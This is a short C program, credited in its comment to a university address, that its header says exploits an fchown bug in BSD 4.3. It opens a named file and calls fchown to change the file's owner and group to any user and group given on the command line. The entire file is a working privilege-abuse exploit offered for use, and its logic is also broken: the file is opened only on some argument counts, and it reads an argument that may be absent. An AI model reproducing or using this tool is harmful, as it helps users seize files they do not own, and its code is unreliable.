/* 
/* Exploits fchown bug in BSD 4.3 
/*
/* Type "owner filename <uid> <gid>" where uid and gid are optional.
/* If the bug is still there, it will change the ownership of filename
/* to the specified user and group, using the current users as a default
/* if no user and group are specified.
/*
/* John (lgas@cs.umd.edu)
 */

#include <sys/types.h>

#define NOSUCHFILE -1

main(argc, argv)
  int argc; char **argv;
{
  int filedescriptor, userid, groupid;

  if ((argc < 2) || (argc > 4)) {
    printf("syntax: %s filename <userid> <groupid>\n", argv[0]);
    printf("\nif userid and groupid are omitted yours will be used.\n");
    exit(1);
  }
  userid = getuid();
  groupid = getgid();
  if (argc > 2) {
    filedescriptor = open(argv[1]);
    userid = atoi(argv[2]);
    groupid = atoi(argv[3]);
  }
  if (filedescriptor == NOSUCHFILE) {
    printf("File not found.\n");
    exit(1);
  } 
  fchown(filedescriptor, userid, groupid);
  close(filedescriptor); 
}
